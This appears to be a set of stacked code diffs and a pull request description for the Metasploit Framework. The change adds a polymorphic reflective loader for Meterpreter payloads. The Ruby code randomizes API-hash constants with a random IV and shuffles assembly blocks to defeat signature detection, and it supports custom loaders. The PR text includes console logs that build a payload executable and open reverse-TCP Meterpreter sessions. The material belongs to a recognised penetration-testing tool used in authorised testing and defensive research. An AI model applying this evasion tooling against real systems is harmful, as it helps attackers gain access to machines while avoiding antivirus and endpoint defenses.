+      rdi_offset: rdi_offset || dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
+      length:     dll.length + (loader ? loader.length : 0), # total payload length = DLL + reflective loader
+      stageless:  opts[:stageless] == true
+    }
+
+    dlog("Using custom loader from #{custom_loader_path}") if custom_loader_path
+    dlog('Using polymorphic reflective loader') if !custom_loader_path && use_loader
+    dlog("Loader length: #{loader.length} bytes") if use_loader
     dlog("DLL length: #{dll.length} bytes")
     dlog("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
     dlog("Configuration offset: #{asm_opts[:length]} bytes")
@@ -150,7 +162,8 @@ module Payload::Windows::MeterpreterLoader_x64
 
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
-    dll + loader
+    dll += loader if use_loader
+    dll
   end
 end
 

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -112,7 +112,8 @@ module Payload::Windows::MeterpreterLoader_x64
     dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(dll_path))
     begin
       rdi_offset = parse_pe(dll)
-    rescue
+    rescue Rex::PeParsey::PeError => e
+      elog("Failed to parse metsrv (x64) as a PE, falling back to the polymorphic loader: #{e.class}: #{e.message}")
       rdi_offset = nil
     end
 
@@ -127,9 +128,10 @@ module Payload::Windows::MeterpreterLoader_x64
 
     use_loader = false
     if custom_loader_path
+      loader = ::File.binread(custom_loader_path)
+      validate_custom_loader!(loader, custom_loader_path)
       dlog("Using custom loader from #{custom_loader_path}")
       ::MetasploitPayloads.warn_local_path(custom_loader_path)
-      loader = ::File.binread(custom_loader_path)
       use_loader = true
     end
 

--- a/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
@@ -1,0 +1,26 @@
+module Msf::Payload::Windows::ReflectiveLoaderX64
+
+  def reflective_loader(opts = {})
+    iv = opts.fetch(:iv) { rand(0x100000000) }
+
+    reflective_loader_asm = Rex::Payloads::Shuffle.from_graphml_file(
+      File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x64.graphml'),
+      arch: ARCH_X64,
+      name: 'reflective_loader'
+    )
+    
+    # Patch the assembly to set the correct IV
+    # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00  =>  mov r9d, <iv>
+    # iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    # unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00")
+    #   raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
+    # end
+    # asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
+
+
+    code = Metasm::Shellcode.assemble(Metasm::X64.new, reflective_loader_asm).encode_string
+    hash = Rex::Text.md5_raw(code).unpack("H*").first
+    vprint_status("Reflective Loader GraphML fingerprint: #{hash}")
+    code
+  end
+end

--- a/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
@@ -1,7 +1,7 @@
 module Msf::Payload::Windows::ReflectiveLoaderX64
 
   def reflective_loader(opts = {})
-    iv = opts.fetch(:iv) { rand(0x100000000) }
+    iv = opts.fetch(:iv) { rand(0x100000000) } & 0xFFFFFFFF
 
     reflective_loader_asm = Rex::Payloads::Shuffle.from_graphml_file(
       File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x64.graphml'),
@@ -9,15 +9,44 @@ module Msf::Payload::Windows::ReflectiveLoaderX64
       name: 'reflective_loader'
     )
     
-    # Patch the assembly to set the correct IV
-    # db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00  =>  mov r9d, <iv>
-    # iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    # unless asm.include?("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00")
-    #   raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})"
-    # end
-    # asm.sub!("db 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xb9, #{iv_bytes}")
+    _patch_bytes = lambda { |asm, oldbytes, newbytes|
+      unless asm.include?(oldbytes)
+        raise "Failed to patch, opcode: #{oldbytes} not found."
+      end
+      asm.sub!(oldbytes, newbytes)
+    }
 
+    _to_hashbytes = lambda { |name, nullbyte: false, unicode: false, iv: 0|
+        name = name.unpack('C*').pack('v*') if unicode
+        fun_hash = Rex::Text.ror13_hash(name + (nullbyte ? "\x00" : ""), iv: iv) & 0xFFFFFFFF
+        [fun_hash].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    }
 
+    # Patching IV
+    iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
+    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0x41, 0xbc, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xbc, #{iv_bytes}")
+    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0xb8, 0x00, 0x00, 0x00, 0x00", "db 0xb8, #{iv_bytes}")
+
+    vprint_status("Random IV: #{iv}")
+    patches = [
+      { :base => "db 0x41, 0x81, 0xfc,", name: 'KERNEL32.DLL', unicode: true },
+      { :base => "db 0x41, 0x81, 0xfc,", name: 'NTDLL.DLL', unicode: true},
+      { :base => "db 0x3d,", name: 'LoadLibraryA', count: 2},
+      { :base => "db 0x3d,", name: 'GetProcAddress'},
+      { :base => "db 0x3d,", name: 'ZwAllocateVirtualMemory', count: 2},
+      { :base => "db 0x3d,", name: 'ZwProtectVirtualMemory'},
+      { :base => "db 0x3d,", name: 'NtFlushInstructionCache', count: 2},
+    ]
+
+    patches.each { |patch|
+      count = patch.fetch(:count) { 1 }
+      old_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: 0)
+      new_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: iv)
+      count.times do
+        vprint_status("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
+        reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "#{patch[:base]} #{old_hash}", "#{patch[:base]} #{new_hash}")
+      end
+    }
     code = Metasm::Shellcode.assemble(Metasm::X64.new, reflective_loader_asm).encode_string
     hash = Rex::Text.md5_raw(code).unpack("H*").first
     vprint_status("Reflective Loader GraphML fingerprint: #{hash}")

--- a/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
@@ -1,55 +1,21 @@
 module Msf::Payload::Windows::ReflectiveLoaderX64
+  include Msf::Payload::Windows::ReflectiveLoaderCommon
 
+  # Assemble the polymorphic x64 reflective loader shellcode with a fresh
+  # ROR13 IV. See {ReflectiveLoaderCommon#build_reflective_loader} for the
+  # patching pipeline.
+  #
+  # @param opts [Hash]
+  # @option opts [Integer] :iv 32-bit seed for ROR13 hashing (random when omitted)
+  # @return [String] assembled and patched x64 reflective loader shellcode
+  # @raise [ReflectiveLoaderCommon::Error] if an expected opcode pattern is missing from the shuffled assembly
   def reflective_loader(opts = {})
-    iv = opts.fetch(:iv) { rand(0x100000000) } & 0xFFFFFFFF
-
-    reflective_loader_asm = Rex::Payloads::Shuffle.from_graphml_file(
-      File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x64.graphml'),
-      arch: ARCH_X64,
-      name: 'reflective_loader'
-    )
-    
-    _patch_bytes = lambda { |asm, oldbytes, newbytes|
-      unless asm.include?(oldbytes)
-        raise "Failed to patch, opcode: #{oldbytes} not found."
-      end
-      asm.sub!(oldbytes, newbytes)
-    }
-
-    _to_hashbytes = lambda { |name, nullbyte: false, unicode: false, iv: 0|
-        name = name.unpack('C*').pack('v*') if unicode
-        fun_hash = Rex::Text.ror13_hash(name + (nullbyte ? "\x00" : ""), iv: iv) & 0xFFFFFFFF
-        [fun_hash].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    }
-
-    # Patching IV
-    iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0x41, 0xbc, 0x00, 0x00, 0x00, 0x00", "db 0x41, 0xbc, #{iv_bytes}")
-    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0xb8, 0x00, 0x00, 0x00, 0x00", "db 0xb8, #{iv_bytes}")
-
-    vprint_status("Random IV: #{iv}")
-    patches = [
-      { :base => "db 0x41, 0x81, 0xfc,", name: 'KERNEL32.DLL', unicode: true },
-      { :base => "db 0x41, 0x81, 0xfc,", name: 'NTDLL.DLL', unicode: true},
-      { :base => "db 0x3d,", name: 'LoadLibraryA', count: 2},
-      { :base => "db 0x3d,", name: 'GetProcAddress'},
-      { :base => "db 0x3d,", name: 'ZwAllocateVirtualMemory', count: 2},
-      { :base => "db 0x3d,", name: 'ZwProtectVirtualMemory'},
-      { :base => "db 0x3d,", name: 'NtFlushInstructionCache', count: 2},
-    ]
-
-    patches.each { |patch|
-      count = patch.fetch(:count) { 1 }
-      old_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: 0)
-      new_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: iv)
-      count.times do
-        vprint_status("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
-        reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "#{patch[:base]} #{old_hash}", "#{patch[:base]} #{new_hash}")
-      end
-    }
-    code = Metasm::Shellcode.assemble(Metasm::X64.new, reflective_loader_asm).encode_string
-    hash = Rex::Text.md5_raw(code).unpack("H*").first
-    vprint_status("Reflective Loader GraphML fingerprint: #{hash}")
-    code
+    build_reflective_loader(opts, {
+      graphml_path:      File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x64.graphml'),
+      arch:              ARCH_X64,
+      metasm_arch:       Metasm::X64,
+      iv_patch_prefixes: ['db 0x41, 0xbc,', 'db 0xb8,'],
+      dll_hash_base:     'db 0x41, 0x81, 0xfc,'
+    })
   end
 end

--- a/lib/msf/core/reflective_dll_loader.rb
+++ b/lib/msf/core/reflective_dll_loader.rb
@@ -16,6 +16,12 @@ module Msf::ReflectiveDLLLoader
   # In new RDI DLLs that come with MSF
   EXPORT_REFLECTIVELOADER = 1
 
+  # Minimum plausible size, in bytes, for a site-local custom reflective
+  # loader. This is only a sanity floor to catch obviously-broken input
+  # (empty files, truncated downloads, the wrong file entirely) -- it is
+  # not, and cannot be, a correctness check of the shellcode itself.
+  MIN_CUSTOM_LOADER_SIZE = 64
+
   # Load a reflectively-injectable DLL from disk and find the offset
   # to the ReflectiveLoader function inside the DLL.
   #
@@ -55,6 +61,23 @@ module Msf::ReflectiveDLLLoader
 
   private
 
+  # Sanity-check a site-local custom loader's bytes before splicing them
+  # onto the end of the DLL and jumping into them. A custom loader is raw
+  # shellcode, not a parseable format, so this can only catch grossly
+  # malformed input (missing, empty, or implausibly small); it cannot
+  # verify the shellcode actually implements a working ReflectiveLoader.
+  #
+  # @param [String, nil] loader Raw bytes read from the custom loader file.
+  # @param [String] path Path the loader was read from, for the error message.
+  # @raise [RuntimeError] if the loader is missing, empty, or implausibly small.
+  def validate_custom_loader!(loader, path)
+    size = loader.to_s.length
+    if size < MIN_CUSTOM_LOADER_SIZE
+      raise "Custom loader at #{path} is only #{size} bytes (minimum #{MIN_CUSTOM_LOADER_SIZE}); " \
+            'it does not look like a valid reflective loader. Refusing to use it.'
+    end
+  end
+
   def parse_pe(dll, loader_name: 'ReflectiveLoader', loader_ordinal: EXPORT_REFLECTIVELOADER)
     pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
     offset = nil
@@ -72,7 +95,7 @@ module Msf::ReflectiveDLLLoader
     # fallback to the known ordinal export for RDI DLLs?
     if offset.nil? && !loader_ordinal.nil?
       e = pe.exports.entries.find {|e| e.ordinal == loader_ordinal}
-      offset = pe.rva_to_file_offset(e.rva)
+      offset = pe.rva_to_file_offset(e.rva) if e
     end
 
     offset

--- a/lib/rex/payloads/shuffle.rb
+++ b/lib/rex/payloads/shuffle.rb
@@ -23,11 +23,19 @@ module Rex
       # @param name [String] An optional symbol name to apply to the assembly source.
       def self.from_graphml_file(file_path, arch: nil, name: nil)
         graphml = Rex::Parser::GraphML.from_file(file_path)
-        blocks = create_path(graphml.nodes.select { |_id,node| node.attributes['type'] == 'block' }, graphml.graphs[0].edges)
-        blocks.map! { |block| { node: block, instructions: process_block(block) } }
+        blocks = create_path(graphml.nodes.select { |_id,node| %w[ data instructions-graph ].include?(node.attributes['type']) }, graphml.graphs[0].edges)
+        blocks.map! do |block|
+          hash = { node: block }
+
+          if block.attributes['type'] == 'instructions-graph'
+            hash[:instructions] = process_instructions_graph_block(block)
+          end
+
+          hash
+        end
 
         label_prefix = Rex::Text.rand_text_alpha_lower(4)
-        labeler = lambda { |address| "loc_#{label_prefix}#{ address.to_s(16).rjust(4, '0') }" }
+        labeler = lambda { |address| "loc_#{label_prefix}#{address.to_s(16).rjust(4, '0')}" }
 
         source_lines = []
         labeled = []
@@ -36,22 +44,30 @@ module Rex
           if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? arch
             source_lines << labeler.call(block[:node].attributes['address']) + ':'
             labeled << block[:node].attributes['address']
-            # by default use the raw binary instruction to avoid syntax compatibility issues with metasm
-            instructions = block[:instructions].map { |node| 'db ' + node.attributes['instruction.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') }
+            case block[:node].attributes['type']
+            when 'data'
+              instructions = [ 'db ' + block[:node].attributes['data.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') ]
+            when 'instructions-graph'
+              # by default use the raw binary instruction to avoid syntax compatibility issues with metasm
+              instructions = block[:instructions].map { |node| 'db ' + node.attributes['instruction.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') }
+            end
           else
             instructions = block[:instructions].map { |node| node.attributes['instruction.source'] }
           end
+
           unless arch.nil?
             raise ArgumentError, 'Unsupported architecture' if FLOW_INSTRUCTIONS[arch].nil?
 
-            # if a supported architecture was specified, use the original source and apply the necessary labels
-            block[:instructions].each_with_index do |node, index|
-              next unless match = /^(?<mnemonic>\S+)\s+(?<address>0x[a-f0-9]+)$/.match(node.attributes['instruction.source'])
-              next unless FLOW_INSTRUCTIONS[arch].include? match[:mnemonic]
+            if block[:node].attributes['type'] == 'instructions-graph'
+              # if a supported architecture was specified, use the original source and apply the necessary labels
+              block[:instructions].each_with_index do |node, index|
+                next unless match = /^(?<mnemonic>\S+)\s+(?<address>0x[a-f0-9]+)$/.match(node.attributes['instruction.source'])
+                next unless FLOW_INSTRUCTIONS[arch].include? match[:mnemonic]
 
-              address = Integer(match[:address])
-              instructions[index] = "#{match[:mnemonic]} #{labeler.call(address)}"
-              label_refs << address
+                address = Integer(match[:address])
+                instructions[index] = "#{match[:mnemonic]} #{labeler.call(address)}"
+                label_refs << address
+              end
             end
           end
 
@@ -75,7 +91,7 @@ module Rex
         # Process the specified graph element which represents a single basic block in assembly. This graph element
         # contains nodes representing each of its instructions.
         #
-        def process_block(block)
+        def process_instructions_graph_block(block)
           subgraph = block.subgraph
           instructions = subgraph.nodes.select { |_id, node| node.attributes['type'] == 'instruction' }
           create_path(instructions, subgraph.edges)

--- a/lib/rex/payloads/shuffle.rb
+++ b/lib/rex/payloads/shuffle.rb
@@ -49,13 +49,18 @@ module Rex
             labeled << block[:node].attributes['address']
             case block[:node].attributes['type']
             when 'data'
-              instructions = [ 'db ' + block[:node].attributes['data.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') ]
+              instructions = data_block_instructions(block[:node])
             when 'instructions-graph', 'block'
               # by default use the raw binary instruction to avoid syntax compatibility issues with metasm
               instructions = block[:instructions].map { |node| 'db ' + node.attributes['instruction.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') }
             end
           else
-            instructions = block[:instructions].map { |node| node.attributes['instruction.source'] }
+            case block[:node].attributes['type']
+            when 'data'
+              instructions = data_block_instructions(block[:node])
+            when 'instructions-graph', 'block'
+              instructions = block[:instructions].map { |node| node.attributes['instruction.source'] }
+            end
           end
 
           unless arch.nil?
@@ -89,6 +94,14 @@ module Rex
 
       class << self
         private
+
+        #
+        # Render a 'data' node's raw bytes as a `db` directive. This representation is
+        # architecture-agnostic, so it's used regardless of whether +arch+ was specified.
+        #
+        def data_block_instructions(node)
+          [ 'db ' + node.attributes['data.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') ]
+        end
 
         #
         # Process the specified graph element which represents a single basic block in assembly. This graph element

--- a/lib/rex/payloads/shuffle.rb
+++ b/lib/rex/payloads/shuffle.rb
@@ -21,20 +21,23 @@ module Rex
       #
       # @param file_path [String] The file path to load the GraphML data from.
       # @param name [String] An optional symbol name to apply to the assembly source.
-      def self.from_graphml_file(file_path, arch: nil, name: nil)
+      # @param random [Random] Optional seeded RNG used for shuffling and label naming. When
+      #   supplied, the resulting assembly source is deterministic for a given seed; when nil,
+      #   the global RNG is used and output is non-deterministic.
+      def self.from_graphml_file(file_path, arch: nil, name: nil, random: nil)
         graphml = Rex::Parser::GraphML.from_file(file_path)
-        blocks = create_path(graphml.nodes.select { |_id,node| %w[ data instructions-graph ].include?(node.attributes['type']) }, graphml.graphs[0].edges)
+        blocks = create_path(graphml.nodes.select { |_id,node| %w[ data instructions-graph ].include?(node.attributes['type']) }, graphml.graphs[0].edges, random: random)
         blocks.map! do |block|
           hash = { node: block }
 
           if block.attributes['type'] == 'instructions-graph'
-            hash[:instructions] = process_instructions_graph_block(block)
+            hash[:instructions] = process_instructions_graph_block(block, random: random)
           end
 
           hash
         end
 
-        label_prefix = Rex::Text.rand_text_alpha_lower(4)
+        label_prefix = random ? Array.new(4) { ('a'.ord + random.rand(26)).chr }.join : Rex::Text.rand_text_alpha_lower(4)
         labeler = lambda { |address| "loc_#{label_prefix}#{address.to_s(16).rjust(4, '0')}" }
 
         source_lines = []
@@ -91,20 +94,20 @@ module Rex
         # Process the specified graph element which represents a single basic block in assembly. This graph element
         # contains nodes representing each of its instructions.
         #
-        def process_instructions_graph_block(block)
+        def process_instructions_graph_block(block, random: nil)
           subgraph = block.subgraph
           instructions = subgraph.nodes.select { |_id, node| node.attributes['type'] == 'instruction' }
-          create_path(instructions, subgraph.edges)
+          create_path(instructions, subgraph.edges, random: random)
         end
 
-        def create_path(nodes, edges)
+        def create_path(nodes, edges, random: nil)
           path = []
 
           # the initial choices are any node without a predecessor (dependency)
           targets = edges.map(&:target)
           choices = nodes.values.select { |node| !targets.include? node.id }
           until choices.empty?
-            selection = choices.sample
+            selection = random ? choices.sample(random: random) : choices.sample
             choices.delete(selection)
             path << selection
 

--- a/lib/rex/payloads/shuffle.rb
+++ b/lib/rex/payloads/shuffle.rb
@@ -26,11 +26,11 @@ module Rex
       #   the global RNG is used and output is non-deterministic.
       def self.from_graphml_file(file_path, arch: nil, name: nil, random: nil)
         graphml = Rex::Parser::GraphML.from_file(file_path)
-        blocks = create_path(graphml.nodes.select { |_id,node| %w[ data instructions-graph ].include?(node.attributes['type']) }, graphml.graphs[0].edges, random: random)
+        blocks = create_path(graphml.nodes.select { |_id,node| %w[ data instructions-graph block ].include?(node.attributes['type']) }, graphml.graphs[0].edges, random: random)
         blocks.map! do |block|
           hash = { node: block }
 
-          if block.attributes['type'] == 'instructions-graph'
+          if %w[ instructions-graph block ].include?(block.attributes['type'])
             hash[:instructions] = process_instructions_graph_block(block, random: random)
           end
 
@@ -50,7 +50,7 @@ module Rex
             case block[:node].attributes['type']
             when 'data'
               instructions = [ 'db ' + block[:node].attributes['data.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') ]
-            when 'instructions-graph'
+            when 'instructions-graph', 'block'
               # by default use the raw binary instruction to avoid syntax compatibility issues with metasm
               instructions = block[:instructions].map { |node| 'db ' + node.attributes['instruction.hex'].strip.chars.each_slice(2).map { |hex| '0x' + hex.join }.join(', ') }
             end
@@ -61,7 +61,7 @@ module Rex
           unless arch.nil?
             raise ArgumentError, 'Unsupported architecture' if FLOW_INSTRUCTIONS[arch].nil?
 
-            if block[:node].attributes['type'] == 'instructions-graph'
+            if %w[ instructions-graph block ].include?(block[:node].attributes['type'])
               # if a supported architecture was specified, use the original source and apply the necessary labels
               block[:instructions].each_with_index do |node, index|
                 next unless match = /^(?<mnemonic>\S+)\s+(?<address>0x[a-f0-9]+)$/.match(node.attributes['instruction.source'])

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 255671
+  CachedSize = 248902
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows


### PR DESCRIPTION
This PR improves the Meterpreter Loader
Fixes: https://github.com/rapid7/metasploit-framework/issues/21132
This pull request adds support for using a custom loader when staging the Meterpreter
- [x] x64 with polymorphism feature
- [x] x86 with polymorphism feature
**Custom Loader Support:**

* Added a new advanced option `MeterpreterLoader::CustomLoader` (boolean)

* Updated the `stage_meterpreter` method to check for the custom loader option and, if enabled, read and append a user-provided custom loader binary (`custom_loader.x64.bin`) to the Meterpreter DLL, adjusting offsets

In addition to the custom loader option, the x64 meterpreter loader now also have a Polymorphic Reflective Loader embedded into the stub. This allows to use metsrv DLLs that doesn't have any reflective loader included.

Reflective Loader Features:
- written directly in assembler
- support indirect syscall (jump to syscall addresss of the ntdll)
- randomization of the ror13 IV
- instructions randomization and block randomization using [crimson-forge](https://github.com/zeroSteiner/crimson-forge)
- section memory protection patching

```
msf payload(windows/x64/meterpreter_reverse_tcp) > reload_lib -a
[*] Reloading /home/j/Documents/dev/metasploit-framework/lib/msf/core/payload/windows/x64/reflective_loader_x64.rb
[*] Reloading /home/j/Documents/dev/metasploit-framework/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
msf payload(windows/x64/meterpreter_reverse_tcp) > generate -f exe -o ~/Public/metsrv.v2.exe
[*] Random IV: 1618680637
[*] Applying patch from 0x5b, 0xbc, 0x4a, 0x6a to 0xbb, 0xf9, 0x65, 0xe5 for KERNEL32.DLL
[*] Applying patch from 0x5d, 0x68, 0xfa, 0x3c to 0x24, 0x87, 0x52, 0x0c for NTDLL.DLL
[*] Applying patch from 0x8e, 0x4e, 0x0e, 0xec to 0x64, 0x02, 0xc0, 0xf3 for LoadLibraryA
[*] Applying patch from 0x8e, 0x4e, 0x0e, 0xec to 0x64, 0x02, 0xc0, 0xf3 for LoadLibraryA
[*] Applying patch from 0xaa, 0xfc, 0x0d, 0x7c to 0x2c, 0xf2, 0x7a, 0x68 for GetProcAddress
[*] Applying patch from 0xed, 0x4a, 0x3d, 0xd3 to 0x51, 0x5a, 0xe9, 0x3a for ZwAllocateVirtualMemory
[*] Applying patch from 0xed, 0x4a, 0x3d, 0xd3 to 0x51, 0x5a, 0xe9, 0x3a for ZwAllocateVirtualMemory
[*] Applying patch from 0x89, 0x4d, 0x3f, 0xbc to 0x7f, 0xba, 0x2b, 0x3e for ZwProtectVirtualMemory
[*] Applying patch from 0xb8, 0x0a, 0x4c, 0x53 to 0x1b, 0x1a, 0xf8, 0xba for NtFlushInstructionCache
[*] Applying patch from 0xb8, 0x0a, 0x4c, 0x53 to 0x1b, 0x1a, 0xf8, 0xba for NtFlushInstructionCache
[*] Reflective Loader GraphML fingerprint: 2436c22403aa3f3a8cc0a7ab0b669ed6
[*] Loader length: 1632 bytes
[*] DLL length: 247808 bytes
[*] ReflectiveLoader offset: 247808 bytes
[*] Configuration offset: 249440 bytes
[*] Writing 257536 bytes to ~/Public/metsrv.v2.exe...
msf payload(windows/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 2 opened (192.168.1.20:4444 -> 192.168.1.20:55098) at 2026-05-14 17:01:31 +0200

msf payload(windows/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo

Computer        : QUICKEM-Q3RNBUJ
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```

```
msf payload(windows/meterpreter_reverse_tcp) > to_handler
[*] Random IV: 143706953
[*] Applying patch from 0x5b, 0xbc, 0x4a, 0x6a to 0x63, 0x05, 0x16, 0xfb for KERNEL32.DLL
[*] Applying patch from 0x5d, 0x68, 0xfa, 0x3c to 0x90, 0x8c, 0x3c, 0x0f for NTDLL.DLL
[*] Applying patch from 0x8e, 0x4e, 0x0e, 0xec to 0x1f, 0x03, 0x1b, 0x75 for LoadLibraryA
[*] Applying patch from 0x8e, 0x4e, 0x0e, 0xec to 0x1f, 0x03, 0x1b, 0x75 for LoadLibraryA
[*] Applying patch from 0xaa, 0xfc, 0x0d, 0x7c to 0xcc, 0x20, 0x3b, 0xbf for GetProcAddress
[*] Applying patch from 0xed, 0x4a, 0x3d, 0xd3 to 0x07, 0x5d, 0x5e, 0x3c for ZwAllocateVirtualMemory
[*] Applying patch from 0xed, 0x4a, 0x3d, 0xd3 to 0x07, 0x5d, 0x5e, 0x3c for ZwAllocateVirtualMemory
[*] Applying patch from 0x89, 0x4d, 0x3f, 0xbc to 0xad, 0x7a, 0x82, 0xde for ZwProtectVirtualMemory
[*] Applying patch from 0xb8, 0x0a, 0x4c, 0x53 to 0xd1, 0x1c, 0x6d, 0xbc for NtFlushInstructionCache
[*] Applying patch from 0xb8, 0x0a, 0x4c, 0x53 to 0xd1, 0x1c, 0x6d, 0xbc for NtFlushInstructionCache
[*] Reflective Loader GraphML fingerprint: 55035c0e06de4ba1c705625e13beb6de
[*] Loader length: 1247 bytes
[*] DLL length: 198144 bytes
[*] ReflectiveLoader offset: 198144 bytes
[*] Configuration offset: 199391 bytes
[*] Payload Handler Started as Job 0
msf payload(windows/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.185.233.241:4444
[*] Meterpreter session 1 opened (10.185.233.241:4444 -> 10.185.233.241:43864) at 2026-07-10 15:57:39 +0200

msf payload(windows/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: QUICKEM-Q3RNBUJ\Quickemu
meterpreter > sysinfo
Computer        : QUICKEM-Q3RNBUJ
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >
```